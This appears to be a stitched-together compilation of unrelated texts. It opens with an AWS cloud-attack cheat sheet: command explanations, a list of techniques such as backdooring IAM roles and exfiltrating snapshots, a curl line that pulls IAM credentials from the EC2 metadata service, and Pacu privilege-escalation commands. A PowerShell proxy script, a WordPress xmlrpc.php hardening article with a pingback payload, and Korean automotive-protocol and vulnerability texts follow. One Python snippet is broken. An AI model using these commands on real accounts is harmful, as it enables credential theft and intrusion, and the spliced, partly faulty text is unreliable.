aws ec2 describe-instance-attribute --instance-id <instance_id> --attribute userData --query "UserData.Value" --output text --region <region>: This AWS CLI command describes the specified EC2 instance attribute, which in this case is the user data. The<instance_id>parameter is the ID of the EC2 instance for which you want to retrieve the user data, and the<region>parameter specifies the AWS region where the instance is located. The--queryoption extracts the value of theUserData.Valueattribute, and the--outputoption sets the output format to text.
base64 --decode: This command decodes the base64-encoded user data retrieved from the previous AWS CLI command. The--decodeoption instructs thebase64command to perform the decoding operation.
import boto3: This imports the Boto3 library, which is the official AWS SDK for Python.
ec2 = boto3.client('ec2'): This creates an EC2 client object using Boto3.
response = ec2.describe_instance_attribute(InstanceId='<instance_id>', Attribute='userData'): This calls thedescribe_instance_attributemethod of the EC2 client to retrieve the specified attribute of the EC2 instance. The<instance_id>parameter is the ID of the EC2 instance, and theAttributeparameter is set to'userData'to retrieve the user data.
print(response['UserData']['Value'].decode('base64')): This retrieves the value of the'UserData'key from the response, which contains the base64-encoded user data. Thedecode('base64')method is used to decode the base64-encoded user data. The decoded user data is then printed to the console.
terraform init: Initializes the Terraform working directory, downloading any necessary providers and setting up the environment.
terraform import aws_instance.this <instance_id>: Imports an existing EC2 instance into the Terraform state. This associates the EC2 instance in the AWS account with the corresponding Terraform resource.
terraform apply -auto-approve -var 'instance_id=<instance_id>': Applies the Terraform configuration and provisions any required resources. The-auto-approveflag skips the interactive confirmation prompt, and the-varflag sets the value of theinstance_idvariable used within the Terraform configuration.
Launch Unusual EC2 instances
--image-id <image_id>: Specifies the ID of the Amazon Machine Image (AMI) to use as the base for the EC2 instance. It defines the operating system and other software installed on the instance.
--instance-type p2.xlarge: Specifies the instance type, which determines the hardware specifications (such as CPU, memory, and storage capacity) of the EC2 instance. In this case,p2.xlargeis the instance type.
--count 1: Specifies the number of instances to launch. In this case, it launches a single instance.
--region <region>: Specifies the AWS region in which to launch the instance. The region defines the geographical location where the EC2 instance will be provisioned.
The-var 'instance_type=p2.xlarge'option is used to set a variable namedinstance_typeto the valuep2.xlarge. This variable can be referenced in the Terraform configuration files to dynamically configure resources.
import boto3: Imports the Boto3 library, which provides an interface to interact with AWS services using Python.
ec2 = boto3.resource('ec2'): Creates an EC2 resource object using Boto3. This resource object allows us to interact with EC2 instances.
instance = ec2.create_instances(ImageId='<image_id>', InstanceType='p2.xlarge', MinCount=1, MaxCount=1): Creates a new EC2 instance using the specified image ID and instance type. TheMinCountandMaxCountparameters are both set to 1, indicating that a single instance should be launched.
print(instance[0].id): Prints the ID of the created EC2 instance. Theinstancevariable is a list, andinstance[0]refers to the first (and in this case, the only) instance in the list. The.idattribute retrieves the ID of the instance.
Execute Commands on EC2 Instance via User Data
Open Ingress Port 22 on a Security Group
Exfiltrate an AMI by Sharing It
Exfiltrate EBS Snapshot by Sharing It
Exfiltrate RDS Snapshot by Sharing
Backdoor an S3 Bucket via its Bucket Policy
Console Login without MFA
Backdoor an IAM Role
Create an Access Key on an IAM User
Create an administrative IAM User
Create a Login Profile on an IAM User
Backdoor Lambda Function Through Resource-Based Policy
Overwrite Lambda Function Code
Create an IAM Roles Anywhere trust anchor
Execute Command on Virtual Machine using Custom Script Extension
Execute Commands on Virtual Machine using Run Command
Export Disk Through SAS URL
Create an Admin GCP Service Account
Create a GCP Service Account Key
Impersonate GCP Service Accounts
Privilege escalation through KMS key policy modifications
Enumeration of EKS clusters and associated resources
Privilege escalation through RDS database credentials
Enumeration of open S3 buckets and their contents
Privilege escalation through EC2 instance takeover
Enumeration of AWS Glue Data Catalog databases
Privilege escalation through assumed role sessions
Enumeration of ECS clusters and services
Privilege escalation through hijacking AWS SDK sessions
Enumeration of ECR repositories with public access
Privilege escalation through hijacking AWS CLI sessions
Enumeration of Elastic Beanstalk environments with public access
Privilege escalation by attaching an EC2 instance profile
Stealing EC2 instance metadata
Enumeration of EC2 instances with public IP addresses
Enumeration of AWS Systems Manager parameters
Privilege escalation through EC2 metadata
curl: The command-line tool used to perform the HTTP request.
http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>: The URL endpoint of the metadata service to retrieve the security credentials for the specified IAM role. Replace<role_name>with the name of the IAM role.
In this command, thepacu.pyscript is being executed with theescalate_iam_rolesmethod, which is specifically designed to escalate privileges associated with IAM roles. The--profileoption specifies the AWS profile to use for authentication, and the--regionsoption specifies the AWS regions to target. The--instancesoption is used to specify the target EC2 instance ID(s) on which the IAM roles will be escalated.
AWS cross-account enumeration
python3 cloudmapper.py: Executes the CloudMapper tool using the Python 3 interpreter.
enum --account <account_id> --regions <aws_regions>: Specifies the enumeration mode and provides additional parameters to configure the account and regions to scan.
--account <account_id>: Specifies the AWS account ID to scan. Replace<account_id>with the actual AWS account ID you want to enumerate.
--regions <aws_regions>: Specifies the AWS regions to scan. Replace<aws_regions>with a comma-separated list of AWS regions (e.g., us-east-1,us-west-2) you want to include in the enumeration.
python3 pacu.py: Executes the PACU tool using the Python 3 interpreter.
--method enum_organizations: Specifies the specific method to run, in this case,enum_organizations, which is responsible for enumerating AWS Organizations.
--profile <aws_profile>: Specifies the AWS profile to use for authentication. Replace<aws_profile>with the name of the AWS profile configured on your system.
--regions <aws_regions>: Specifies the AWS regions to target for enumeration. Replace<aws_regions>with a comma-separated list of AWS regions (e.g., us-east-1,us-west-2) you want to include in the enumeration.
aws sts assume-role: Initiates the assume-role operation using the AWS Security Token Service (STS).
--role-arn arn:aws:iam::<target_account_id>:role/<role_name>: Specifies the ARN (Amazon Resource Name) of the IAM role you want to assume. Replace<target_account_id>with the ID of the AWS account that owns the role, and<role_name>with the name of the IAM role.
--role-session-name <session_name>: Specifies the name for the session associated with the assumed role. Replace<session_name>with a descriptive name for the session.
<#
.Synopsis
This function will set the proxy settings provided as input to the cmdlet.
.Description
This function will set the proxy server and (optional) Automatic configuration script.
.Parameter Proxy Server
This parameter is set as the proxy for the system.
Data from. This parameter is Mandatory.
.Example
Setting proxy information.
Set-NetProxy -proxy "proxy:7890"
.Example
Setting proxy information and (optional) Automatic Configuration Script.
Set-NetProxy -proxy "proxy:7890" -acs "http://proxy Jump :7892"
#>
Function Set-NetProxy
{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$True,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)]
[String[]]$Proxy,
[Parameter(Mandatory=$False,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)]
[AllowEmptyString()]
[String[]]$acs
)
Begin
{
$regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
}
Process
{
Set-ItemProperty -path $regKey ProxyEnable -value 1
Set-ItemProperty -path $regKey ProxyServer -value $proxy
if($acs)
{
Set-ItemProperty -path $regKey AutoConfigURL -Value $acs
}
}
End
{
Write-Output "Proxy is now enabled"
Write-Output "Proxy Server : $proxy"
if ($acs)
{
Write-Output "Automatic Configuration Script : $acs"
}
else
{
Write-Output "Automatic Configuration Script : Not Defined"
}
}
}
Function Disable-NetProxy
{
Begin
{
$regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
}
Process
{
Set-ItemProperty -path $regKey ProxyEnable -value 0 -ErrorAction Stop
Set-ItemProperty -path $regKey ProxyServer -value "" -ErrorAction Stop
Set-ItemProperty -path $regKey AutoConfigURL -Value "" -ErrorAction Stop
}
End
{
Write-Output "Proxy is now Disabled"
}
}
The xmlrpc.php file can be found in the WordPress core and is generally enabled by default, which leaves your WordPress site exposed to all kinds of malicious attacks.
We are going to look at what the XMLRPC file is, what it does, and, more importantly, how to manage it while boosting your website’s security.
New Plans and Pricing Now Available!
Servebolt’s new plans and pricing model put a greater focus on customization and flexibility while taking advantage of our amazing performance and scalability.
✅ More storage included in all plans ✅ Lower storage pricing ✅ More cost-efficient scaling of traffic and Dynamic Requests ✅ More production environments in all plans ✅ More Servebolt CDN hostnames included in all plans
XML-RPC (eXtensible Markup Language – Remote Procedure Call) was created to offer cross-platform communication. This is a protocol that uses HTTP as a transport and XML as an encoder to generate procedure calls, thus allowing for the ability to run functions on a remote computer.
HTTP requests can be sent by the client (i.e., browser or mobile app) to the server, and the server then sends an HTTP response. The HTTP request can be used to invoke functions, and these functions can then be used to perform specific actions.
This is different from the REST API, as that uses URL parameters to identify resources. In contrast, RPC uses query parameters to offer function arguments.
XMLRPC allows users to interact with their site remotely, such as through the WordPress mobile app or via plugins like JetPack or WooCommerce.
The Security Issues Associated With The xmlrpc.php File
XMLRPC can expose your site to a variety of attacks. Since it’s easy to trace, hackers can send arbitrary XML data, which then allows them to control the site in a number of ways. Here are some security issues that you should know about.
Brute Force Attacks
In a brute force attack, the hackers essentially try to guess the correct password and user name using pure brute force – by attempting thousands of combinations.
If you have a weak admin password and aren’t using multi-factor authentication, there’s a chance that a hacker can brute force their way into your website’s backend.
WPSCAN, a popular tool from Kali Linux, can be used to easily find and list all valid usernames for the website. Once that’s done, hackers can use brute force via the xmlrpc.php file by sending the following request:
This way, hackers can send thousands of combinations until the site sends the correct password. A response indicating that an incorrect input, while also telling the hacker to try again, is shown below:
It returns the HTTP 200 code, indicating that the username and password are incorrect. Hackers don’t even have to worry about reCaptchas or limited login attempts if security is low.
DDoS Attacks
Distributed Denial of Service, or DDoS attacks, can completely take a server offline by sending thousands of requests simultaneously. The pingback feature in WordPress is commonly used by hackers in combination with the xmlrpc.php file to run DDoS attacks.
Usually, hackers find a page that they can target multiple times and then start attacking it. To start the attack, the hacker begins by checking for the xmlrpc.php file. They do this by sending this request:
Once the hackers have confirmation that the xmlrpc.php file is enabled, they then start attacking it with a network of exploited websites to send different pingback requests.
In many cases, this can be automated using the following code:
Cross-site Port Attacks (XSPA) are quite common. Hackers generally initiate these attacks by injecting malicious code to receive information about IP addresses and TCP ports.
Hackers use the pingback.ping technique to pingback a post on a website, which returns the IP address. Then, they use a sniffer to establish an endpoint to send a live blog post URL and a pingback using the following request:
<methodCall> <methodName>pingback.ping</methodName> <params><param> <value><string>http://<YOURSERVER >:<port></string></value> </param><param><value><string>http://<SOMEVALID BLOG FROM THE SITE ></string> </value></param></params> </methodCall>
How to Block XMLRPC Attacks
There are several methods you can use to block XMLRPC attacks – most of which you’ll come across are ineffective – here’s how we recommend addressing this:
How Accelerated Domains and Servebolt CDN Handles XMLRPC Issues
Servebolt has two products that perform XMLRPC security out of the box. They both take the approach that some traffic to this place can be valid, but too much or too often is a sign of a hack attempt.
For example, ourAccelerated Domainsimplementation listens to requests toxmlrpc.php, if there are more than 15 requests in a minute, it will ban that IP address for a whole day. This effectively stops the hack attempt while allowing users of the website via WordPress Mobile or users of Jetpack/WooCommerce to continue to work.
The Servebolt CDN deals with it slightly differently, it also has a threshold of 15 requests per minute from the same IP address to thexmlrpc.php and then bans the IP address for 1 hour.
If you’ve already made the (wise 😄) decision to host your WordPress websites with us – when using Servebolt’s CDN or Accelerated Domains – one of these security options is automatically implemented for you.
Blocking XMLRPC on Cloudflare
It is possible to block traffic toxmlrpc.phpdirectly on Cloudflare, stopping it from ever reaching your server.
This is only a really valid solution if you are also blocking traffic that is not originating from Cloudflare. If you have not already set this up, then it will still be possible for hackers to attempt to access and exploit it on your origin server directly. And, of course, this is easily configurable in just a single click via the Servebolt admin interface.
Where this will help is that, like with Accelerated Domains or CDN from Servebolt, thexmlrpc.phptraffic from bad actors is stopped at the edge long before it reaches the server.
To block all traffic, login to Cloudflare admin, select the domain, click Security, click WAF, create a new firewall rule, and enter the details as shown in the photo below:
Rule Name = whatever you want to call it
Field = URI Path
Operator = equals
Value = /xmlrpc.php
Or you can “edit the expression” and paste it into the following code:
(http.request.uri.path eq "/xmlrpc.php")
Choose the action of “Block” and save & deploy it.
Remember: because you have set this up, you will have to remember it exists. There might be a time in the future when you are wondering whyxmlrpc.phpis not working, and you cannot see it in your server configuration.
Note:If you use this method, you must ensure that your server is configured only to allow traffic that is coming through Cloudflare. As otherwise, it would be possible to bypass this.
In Servebolt, this can be enabled in the control panel:
Alternative Method: Disabling XMLRPC On The Server Altogether
On Apache Servers
A better alternative is to disable the XMLRPC file altogether. This is possible on Apache by just adding a snippet of code in your .htaccess file just before the firm rules added by WordPress:
This is a wise option as it eliminates the misuse of XMLRPC, though there’s a downside: you’ll be disabling remote access to your site. As a result, the mobile app – or Jetpack, for that matter – won’t work properly.
On Nginx Servers
Disabling Nginx is slightly harder as you need to have server configuration access rather than the more simple .htaccess of Apache. To disable, edit the virtual host config file, usually located in /etc/nginx/sites-available and add the following directive to the server block:
server { # // your standard server root and configuration location = /xmlrpc.php { deny all; } # // rest of the server configuration such as PHP-FPM }
Servebolt uses the .htaccess method to deploy this solution to xmlrpc.php. If you are with a managed host like Servebolt and are using Nginx you will most likely need them to implement this for you.
Why Installing a Security Plugin Isn’t a Wise Idea
Most people might be thinking of installing a WordPress security plugin on their site. However, that’s not actually a good idea for several reasons:
The request toxmlrpc.phpwill still be happening, with the security plugin sat in between it and WordPress, using up system resources that will fail quicker in the event of an attack.
They are primarily effective at the application level, not at the server level.
They add unnecessary code to your site, affecting its performance.
They require constant load management.
Security plugins mess with crucial parts of WordPress security, including login – with just a single mistake in code that runs as a part of logins, your site is at greater risk.
Conclusion
Cyberattacks are getting more sophisticated day by day. As a webmaster & business owner, it’s essential to be aware of and understand potential threats and the steps you can take to protect yourself against them. The majority of which can be mitigated with the help of a proactive approach – a combination of monitoring and keeping software up-to-date as well as taking advantage of solutions like Accelerated Domains. When enabled,Accelerated DomainsorServebolt CDNintelligently filters traffic and automatically takes action to protect your website from harmful attacks, ultimately keeping your origin server secure and your site safe.
Any specific questions about XMLRPC or security?Get in touch with us – ourexpert, friendly, and thoroughsupport team is here to help.
XCP 데이터는 XCP 마스터 (측정/캘리브레이션 툴/시스템) 와 XCP 슬레이브 (ECU, Runtime 환경 등) 사이에 메시지 전송 방식으로 교환된다.
전송되는 XCP Message Frame 에 대해 설명하기에 앞서 XCP 통신 모델에 대해 정리하자면, XCP 패킷을 통한 통신은 명령어 (CTO) 를 위한 영역 하나와 동기화 데이터 (DTO) 발송을 위한 영역 하나로 구분된다.
※ CTO (Command Transfer Object) : 명령어 전송에 사용되는 패킷
※ DTO (Data Transfer Object) : 측정/신호 인가 데이터를 동기적으로 교환하는데 사용되는 패킷
CTO / DTO 기반의 XCP 통신 모델
위의 통신 모델에서 사용된 약어는 다음과 같다.
약어
풀이
설명
CMD
Command Packet
명령어 전송 패킷
RES
Command Response Packet
긍정적 응답
ERR
Error
부정적 응답
EV
Event Packet
비동기 이벤트
SERV
Service Request Packet
서비스 요청
DAQ
Data AcQuisition
주기적인 측정값 전송
STIM
Stimulation
슬레이브의 주기적인 신호 인가
XCP Message Frame 전체는 Trasnport Layer 의 Frame 에 포함된다. (e.g. XCP on Ethernet 의 경우, UDP or TCP Packet 내에 포함)
XCP Message Frame 및 각 필드의 의미는 아래와 같다.
XCP Message Frame
Term
Description
XCP Message (Frame)
XCP에서, Master 와 Slave 간 교환하는 메시지 형태
XCP Header
전송 프로토콜 (CAN, FlexRay, CAN-FD, Ethernet 등) 에 의존하는 값
XCP Tail
전송 프로토콜 (CAN, FlexRay, CAN-FD, Ethernet 등) 에 의존하는 값
XCP Packet
XCP 통신에 활용되는 데이터
Identification field
XCP 통신에 사용되는 패킷 식별자로서, Master 와 Slave에서 어떤 메시지를 보냈는지 확인하기 위한 필드
PID
패킷을 식벽하는데 사용되는 필드로 CTO 를 전달할 때, PID 필드는 CMD, RES 또는 다른 CTO 패킷을 식별하기에 사용 XCP 슬레이브는 마스터에게 0xFC ~ 0xFF 주소의 PID 필드를 활용해 응답하거나 통지를 보낸다. DTO를 전송할 때는 식별 필드(FILL, DAQ 등)의 다른 요소도 사용한다.
FILL
alignment를 위해 사용되는 필드로 DAQ(Data Acquisition; 데이터 획득) 측정방법에 사용 특정 이벤트, 신호에 대한 데이터 수집에 사용
DAQ
XCP는 특정 파라미터의 값을 읽기 액세스를 통해 측정하는데 해당 방법을 하기 위해서는 이벤트와 파라미터가 Mapping 되어야 하며 측정방법(주기)에 대한 정보가 필요하다. 이러한 Mapping 정보를 저장한 것이 DAQ List 이고 해당 필드가 이 DAQ List 의 수 나타낸다.
Timestamp Field
메시지 전송 시간을 나타내는 필드 (DTO 메시지 전송에만 사용한다.) 슬레이브는 측정값에 시간 정보를 담기 위해, 타임스탬프를 사용한다.
TIMESTAMP
DTO를 전달받은 마스터는, 측정 값과 슬레이브에서 측정값을 획득한 시점을 가지게 된다. – 동기화(Synchronize) 관점에서 사용.
Data Filed
XCP 패킷에는 데이터 필드에 지정된 데이터도 들어있다.
DATA
CTO 패킷의 경우, 명령어에 대한 파라미터가 들어있다. DTO 패킷의 경우, 슬레이브에서 보낸 측정값과 마스터에서 이 값을 보낸 시점이 들어있다. (DTO 패킷의 경우, TIMESTAMP 는 측정 시간, DATA 에는 마스터에서 요청한 시간이 들어감)
Reference
Andreas Patzer,Rainer Zaiser, XCP-ECU 개발을 위한 표준 프로토콜 - 프로토콜 기초와 응용분야 (Vector, 2014)
[연재 1] 1. 개요 2. 주요 내용 3. 방법론 4. 자동차 관련 취약점 - 건초 더미에서 바늘 찾기4.1 심각도 vs. 관련성 4.2 악명 높은 공급망 취약점 [연재 2] 5. 노후화된 소프트웨어 관련 위험 6. 자동차 소프트웨어에 영향을 미치는 메모리 손상 7. 결론
1. 개요
커넥티드 카(Connected car)의 등장이 현실이 되었다. 커넥티드 카는 기존의 운송 수단 및 모빌리티 서비스를 혁신할 자율주행 기술과 관련된 중요한 이정표를 제공한다. 그러나 이와 같은 발전에는 도전이 따른다.
증가하고 있는 자동차 산업에 대한 사이버 보안 위험에 대한 효과적인 사이버 보안 조치가 없을 경우 공격 표면이 넓은 최신 사양의 자동차는 물리적 손상을 일으킬 수 있는 각종 악의적인 활동에 취약할 수밖에 없고, 이에 따라 운전자와 보행자 모두의 안전에 영향을 미칠 수 있다.
각종 보안 위협에 대한 업계 전반의 인식은 UNECE WP.29 및 ISO/SAE 21434와 같은 국제표준에서도 분명히 드러난다. 두 국제표준 모두 OEM이 공급업체(Suppliers), 서비스 제공업체, 기타 조직과 관련된 다양한 위험을 관리하여 자동차 분야의 사이버 보안을 책임져야 한다고 규정하고 있으며, 다음과 같은 내용을 중심으로 자동차 사이버 보안에 대한 근본적인 변화를 주도한다.
1) 제품의 설계 및 개발 과정의 초기 단계에서 보안 관련 문제를 해결하는 “시프트 레프트(shift left)” 접근방식 도입 2) 제품의 개발, 생산, 운행, 폐기 등 자동차의 라이프사이클 전반에 걸친 사이버 보안 관리의 필요성 3) 자동차 공급망 전반에 걸친 사이버 보안 책임 강화
그러나 자동차 분야의 사이버 위험을 관리하는 것은 간단하지 않다. 제품 보안팀은 제한된 인력으로 일상적으로 발생하는 다양한 보안 문제를 관리하고 자동차 분야 제조업체의 디지털 혁신까지 지원해야 하기 때문이다.
이스라엘 자동차 사이버 보안 위험 평가 전문 기업인사이벨리움(Cybellum)의 ‘2021 자동차 소프트웨어 보안 현황 보고서’는 2020년부터 2021년에 걸쳐 발견된 100개 이상의 자동차 소프트웨어 컴포넌트에 대한 취약점 분석을 기반으로 자동차 소프트웨어와 관련된 주요 보안 위험을 조명한다.
2. 주요 내용
1) “일반적인” 취약점과 다른 자동차 소프트웨어 취약점
2020년에는 그 어느 때보다 많은 취약점이 발견되었지만, 그 중 극히 일부 취약점만이 자동차 소프트웨어에 영향을 미치는 것으로 나타났다. 이는 자동차 산업이 복잡하고 다양한 공급업체와 연관되어 있기 때문이다. 자동차 산업의 보안을 위협하는 취약점을 탐지하는 것은 건초 더미에서 바늘을 찾는 것만큼 까다롭다.
2) 공급망 취약점의 영향을 받는 자동차 소프트웨어
자동차 산업의 공급망은 다수의 복잡한 공급업체로 구성되므로, 이미 오래 전에 발견된 취약점과 최근 새롭게 발견된 취약점 모두의 영향을 받는다. 사이벨리움의 연구에 따르면, 4년 전 발견된 취약점인 ‘BlueBorne’과 같이 상당히 오래된 취약점과 ‘Ripple20’과 같이 최근 새롭게 발견된 취약점 모두 자동차 소프트웨어에 영향을 미치고 있는 것으로 나타났다.
3) 노후화된 소프트웨어로 인한 운영 상의 위험이 발생할 가능성
현재 자동차 제조업체는 다수의 노후화된 소프트웨어를 사용하고 있다. 특히 사이벨리움이 분석한 자동차 ECU 중 90%가 안전한 최신 버전의 소프트웨어를 사용할 수 있음에도 개발 시점이 5년 이상 경과한 오래된 소프트웨어를 사용하고 있는 것으로 나타났다. 최신 상태로 유지 및 관리되지 않는 소프트웨어는 운영 상의 심각한 사이버 보안 문제를 초래할 수 있다.
4) 메모리 손상(Memory Corruption)으로 인한 자동차 소프트웨어 보안 위협
자동차 소프트웨어에 영향을 미치는 대부분의 코딩 관련 약점은 다양한 메모리 관리와 관련된 오류로 인해 발생한다. 버퍼 오버플로(Buffer Overflow), Null 역참조, Use-After-Free 취약점 등의 메모리 손상(Memory Corruption) 취약점은 이미 수년 전에 발견된 것으로 위험도가 낮은 수준의 약점에 해당하지만, 최근 자동차 소프트웨어의 보안에 많은 영향을 미치는 것으로 확인되었다.
3. 방법론
사이벨리움은 ‘2021 자동차 소프트웨어 보안 현황 보고서’를 통해 자동차 소프트웨어 보안의 현재 상태에 대한 심층적인 분석을 제공한다. 보고서의 핵심 내용은 2020년에서 2021년 사이에 발견된 100개 이상의 자동차 소프트웨어 컴포넌트에 대한 분석이며, 이와 관련하여 보고서에 포함된 일부 정보는 오픈소스 소프트웨어를 기반으로 작성되었다.
4. 자동차 관련 취약점
건초 더미에서 바늘 찾기
취약점으로 인한 사이버 공격 피해를 최소화하기 위해서는 취약점 완화의 우선 순위를 지정하는 것이 중요하지만, 자동차 대상의 취약점이 크게 증가하면서 심각도에 따른 취약점 우선 순위 지정 프로세스가 지연되고 있다. 특히 일반적으로 공개되는 취약점이 모두 자동차 소프트웨어에 영향을 미치는 것이 아니기에 자동차와 관련된 취약점을 명확하게 식별하는 것이 쉽지 않고, 이에 따라 적절한 시기에 취약점을 완화하고 해결하지 못하는 사례가 발생하고 있다. 이는 궁극적으로 자동차의 컴포넌트 및 자동차 산업 분야에 속한 조직의 사이버 복원력에 악영향을 미칠 수 있다.
표 1 – 공개된 CVE (Common Vulnerabilities and Exposure) 취약점 (출처: NIST NVD,https://nvd.nist.gov)
소프트웨어의 유효성에 대한 적절한 테스트가 이루어지지 않을 경우 공격자는 특정 형식을 악용하여 입력을 조작할 수 있으며, 이에 따라 응용 프로그램이 의도하지 않은 입력 값을 수신하게 된다. 이 경우 제어 흐름, 리소스에 대한 임의 제어 또는 임의 코드 실행이 이루어질 수 있기 때문에 소프트웨어에 악영향을 미칠 수 있는 취약점을 적절하게 식별할 필요가 있다.
이와 관련하여 아래표 2의 구글(Google)에서 가장 많이 검색된 10개의 CVE 취약점과 사이벨리움이 분석한 자동차 소프트웨어 관련 CVE 취약점 비교 자료를 통해 비교해 볼 때, 일반적인 취약점 목록과 자동차 소프트웨어에 영향을 미치는 취약점 목록이 큰 차이점을 보인다는 것을 알 수 있다. 구글에서 가장 많이 검색된 CVE 취약점은 대부분 엔터프라이즈 및 IT 제품에 영향을 미치는 취약점에 해당하기 때문에 자동차와 관련된 임베디드 시스템과는 차이가 있다.
가장 많이 검색된 CVE (조사 기관: Google)
가장 인기 있는 주요 자동차 CVE (조사 기관: 사이벨리움)
CVE
CVSS점수
영향을 받는 소프트웨어
CVE
CVSS점수
영향을 받는 소프트웨어
2019-0708
9.8
Remote Desktop Services
2020-11656
9.8
SQLite
2017-11882
7.8
Microsoft Office
2019-19646
9.8
SQLite
2017-0199
7.8
Microsoft Office
2019-8457
9.8
SQLite
2018-11776
8.1
Apache Struts
2019-5482
9.8
cURL
2018-5638
10
Jakarta Multipart parser
2018-16842
9.1
cURL
2019-5544
9.8
OpenSLP (ESXi / Horizon DaaS)
2018-14618
9.8
cURL
2017-0143
8.1
SMBv1 server (Microsoft Windows)
2017-12652
9.8
libpng.
2020-0549
5.5
Intel(R) Processors
2017-109189
9.8
SQLite
2020-2555
9.8
Oracle Coherence
2018-1000301
9.1
cURL
2018-7600
9.8
Drupal
2018-1000120
9.8
cURL
표 2 – 일반 CVE 및 자동차 관련 CVE 비교
4.1 심각도 vs. 관련성
표 2에서 CVSS 점수로 표시된 취약점의 심각도를 통해 각 취약점이 자동차 보안에 미치는 영향을 확인할 수 있지만, 이러한 취약점 심각도만을 기준으로 자동차에 미치는 전체적인 보안 위험과 관련된 내용을 확인하는 것에는 한계가 있다. 그러나 일반적인 자동차 OEM 및 제조업체는 보안을 위한 인력 및 시간에 제한이 있기 때문에 자동차 보안에 영향을 미칠 수 있는 모든 취약점을 분석할 수 없고 이에 따라 심각도가 높은 취약점에 대한 식별 및 완화에 집중할 수밖에 없다.
심각도가 ‘중간 단계’로 평가되는 취약점은 전체 취약점에서 약 40%에 이르는 비중을 차지하지만, 심각도가 중간 단계로 평가되기 때문에 취약점 완화를 위한 패치가 적용되지 않은 상태로 자동차 컴포넌트 내에 존재하는 경우가 대부분이다. 그러나 중간 심각도라는 것이 ‘중간 위험’을 의미하는 것이 아니기 때문에, 일부 취약점에는 특정 익스플로잇(Exploit)이 존재하지 않는 일부 심각도가 높은 취약점보다 더욱 심각한 피해를 유발할 수 있다.
CVSS 점수는 취약점 평가 시 취약점 사이의 관련성 및 잠재적 영향을 고려하지 않음
특히 자동차 소프트웨어에 대한 취약점은 전체 공격 체인의 관점에서 컴포넌트 사이의 측면 이동이 가능하도록 자동차의 내부에 진입하는 역할을 한다. 대부분의 보안팀이 심각도가 높은 취약점의 식별 및 완화에 집중하고 있어 중간 심각도를 가진 취약점을 악용하는 공격의 성공률이 높기 때문에 공격자는 중간 심각도를 가진 CVE 공격을 선호한다.
앞서 언급한 것처럼 자동차 소프트웨어에는 다양한 취약점이 내재되어 있다. 자동차 소프트웨어와 관련된 컴포넌트, 소프트웨어 사이의 상관 관계를 분석할 수 있어야 자동차의 컴포넌트에 실질적인 영향을 미칠 수 있는 CVE 취약점을 식별할 수 있으며, 이를 통해 심각도 점수와 관계없이 자동차 보안에 악영향을 미칠 수 있는 CVE까지도 제거할 수 있다.
그러나 사이벨리움의 연구 결과에 따르면, 평균적으로 자동차의 컴포넌트에서 탐지된 CVE 취약점의 80% 이상에 대한 관련성 분석이 이루어지지 않아 심각한 영향을 미칠 수 있는 취약점인데도 완화되거나 제거되지 않은 것으로 나타났다.
80%이상의 CVE 취약점이 제거되지 않음
이를 통해 알 수 있듯이 소프트웨어 기능 사이의 상호 관계에 대한 인식(Context Awareness)은 취약점 관리 프로그램의 투자 수익(Return-On-Investment, ROI)을 최적화하는 동시에 전반적인 제품의 보안성을 향상시킨다.
4.2 악명 높은 공급망 취약점
표 3의 취약점 목록에서는 일부 누락된 사항이 있다. 언론에서 수차례 헤드라인을 장식한 악명 높은 취약점은 자동차 소프트웨어 취약점을 나열한 목록의 상위 10위 안에 포함되지 않았기 때문이다.
자동차 소프트웨어를 위협하는 소위 ‘악명 높은 공급망 취약점’ 중 상위 3개에 해당하는 BlueBorne, DirtyCow, Drown 취약점은 이미 4~5년 전에 발견된 취약점이지만 여전히 자동차 소프트웨어에 영향을 미치고 있다. 체계적인 사이버 보안 관행이 뒷받침되었다면 이러한 취약점은 발견되고 얼마 지나지 않아 완화할 수 있는 해결책이 제시되었어야 한다.
순위취약점 명칭발견된 년도
01
BlueBorne
2017
02
DirtyCow
2016
03
Drown
2016
04
SweynTooth
2020
05
Ripple20
2020
06
Amnesia:33
2020
07
Urgent/11
2019
08
Ghost
2015
표 3 – 자동차 취약점을 위협하는 악명 높은 취약점 순위
Ripple20, Amnesia:33, Urgent/11와 같은 취약점은 여러 공급업체에서 널리 사용되는 통신 스택(Stack)에 내재되어 있는 취약점으로 최근 들어 발견된 공급망 취약점이다.
KEY TAKEAWAYS
공개된 CVE 취약점 중 대부분은 자동차 소프트웨어에 영향을 미치지 않지만 너무 많은 소프트웨어와 취약점이 존재하기 때문에 자동차 또는 컴포넌트에 실질적인 영향을 미치는 취약점을 식별하는 것은 건초 더미에서 바늘을 찾는 것처럼 까다롭다.
기존의 보안 관행은 수동 감지 및 대응을 토대로 수행되기 때문에 깊이 있는 통찰력을 제공할 수 없다. 신속한 문제해결을 위해서는 자동화된 프로세스가 필요하다.
취약점 관리 프로그램은 제품의 컴포넌트와 소프트웨어 사이의 상관관계에 대한 인식 및 분석을 기반으로 자동차 보안에 영향을 미칠 가능성이 높은 위험을 식별할 수 있어야 한다. 실제로 대부분의 보안문제는 제품이 생산되기 전 단계인 개발 과정에서 식별 및 해결될 수 있다.
공급망 위험은 자동차 소프트웨어에 실질적인 영향을 미친다. 몇 년 전 발견된 취약점은 견고한 보안 관행을 통해 완화되었어야 하고 완화될 수 있어야 하는 것이 정상이다.